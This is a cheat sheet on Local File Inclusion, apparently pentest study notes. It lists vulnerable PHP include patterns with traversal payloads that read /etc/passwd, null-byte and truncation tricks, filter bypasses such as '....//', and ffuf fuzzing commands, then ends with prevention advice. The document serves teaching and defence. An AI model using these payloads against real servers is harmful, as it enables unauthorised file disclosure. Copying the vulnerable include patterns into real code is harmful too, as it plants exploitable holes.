LFI

| Function                  | Read Content | Execute | Remote URL |
|---------------------------|--------------|---------|------------|
| PHP                       |              |         |            |
| include()/include_once()  | ✅           | ✅      | ✅         |
| require()/require_once()  | ✅           | ✅      | ❌         |
| file_get_contents()       | ✅           | ❌      | ✅         |
| fopen()/file()            | ✅           | ❌      | ❌         |
| NodeJS                    |              |         |            |
| fs.readFile()             | ✅           | ❌      | ❌         |
| fs.sendFile()             | ✅           | ❌      | ❌         |
| res.render()              | ✅           | ✅      | ❌         |
| Java                      |              |         |            |
| include                   | ✅           | ❌      | ❌         |
| import                    | ✅           | ✅      | ✅         |
| .NET                      |              |         |            |
| @Html.Partial()           | ✅           | ❌      | ❌         |
| @Html.RemotePartial()     | ✅           | ❌      | ✅         |
| Response.WriteFile()      | ✅           | ❌      | ❌         |
| include                   | ✅           | ✅      | ✅         |
Local File Inclusion
Basic LFI
include($_GET['language']);
?language=/etc/passwd
Path Traversal
include("./languages/" . $_GET['language']);
?language=../../../etc/passwd
Filename Prefix
include("lang_" . $_GET['language']);
?language=/../../../etc/passwd
Note: This may not always work, as in this example a directory named lang_/
may not exist, so our relative path may not be correct.
Appended Extensions
include($_GET['language'] . ".php");
Path Truncation
PHP truncates paths longer than 4096 chars, which cuts off an appended extension (older PHP versions only):
?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]
Null bytes
A null byte terminates the path before an appended extension (PHP versions before 5.3.4 only):
/etc/passwd%00
Second order Attacks
/profile/$username/avatar.png -> ../../../etc/passwd
Basic Bypasses
Non-recursive Path Traversal Filters
$language = str_replace('../', '', $_GET['language']);
....// or ..././ or ..../ or ....////
Encoding
%2e%2e%2f
Approved Paths
if(preg_match('/^\.\/languages\/.+$/', $_GET['language'])) {
include($_GET['language']);
} else {
echo 'Illegal path specified!';
}
./languages/../../../../etc/passwd
Automated Scanning
Fuzzing GET parameter names (-fs 2287 filters out responses of the default page size, so only parameters that change the response are shown)
$ ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287
Fuzzing the parameter value with an LFI wordlist
$ ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287
Fuzzing Server Files
Server Web Root
Server Logs/Configs
LFI Tools
Prevention
File Inclusion Prevention
Use a whitelist of allowed file names with exact case matching instead of trying to sanitize the input.
Preventing Directory Traversal
Strip "../" recursively, since a single str_replace() can be bypassed with "....//":
while(substr_count($input, '../', 0)) {
    $input = str_replace('../', '', $input);
}
Note: this loop only handles "../"; it does not cover backslashes or encoded forms, so pair it with a whitelist or a realpath() check against the allowed directory.
Web Server Configuration
Set allow_url_fopen and allow_url_include to Off.
Use Docker or open_basedir = /var/www in php.ini.
Disable PHP Expect and mod_userdir.
WAF